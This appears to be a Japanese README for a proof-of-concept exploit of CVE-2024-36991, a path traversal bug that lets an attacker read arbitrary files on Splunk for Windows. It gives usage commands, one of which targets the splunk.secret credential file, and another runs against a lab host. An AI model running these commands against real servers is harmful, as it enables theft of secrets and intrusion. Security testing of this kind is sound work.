
Windows 向け Splunk の 9.2.2、9.1.5、9.0.10 未満のバージョンにおけるパストラバーサルを介した任意のファイル読み取りを可能にする、CVE-2024-36991 の概念実証エクスプロイト。
CVE-2024-36991 の概念実証です。これは、Windows 上の Splunk バージョン 9.2.2、9.1.5、9.0.10 未満において、攻撃者が任意のファイルを読み取ることを可能にします。
Splunk ファイルを読み取るには、スクリプトを実行し、Splunk が動作しているターゲット URL と、読み取りたい設定ファイルを指定します。例:
python3 CVE-2024-36991.py -u 'https://example.com:8000' -f '/etc/auth/splunk.secret'
Windows システムファイルを読み取るには、--system-files フラグを追加します。例:
python3 CVE-2024-36991.py -u http://haze.htb:8000 -f '/Windows/System32/drivers/etc/hosts' --system-files
このツールは常に良い目的のために使用してください。倫理的であれ (: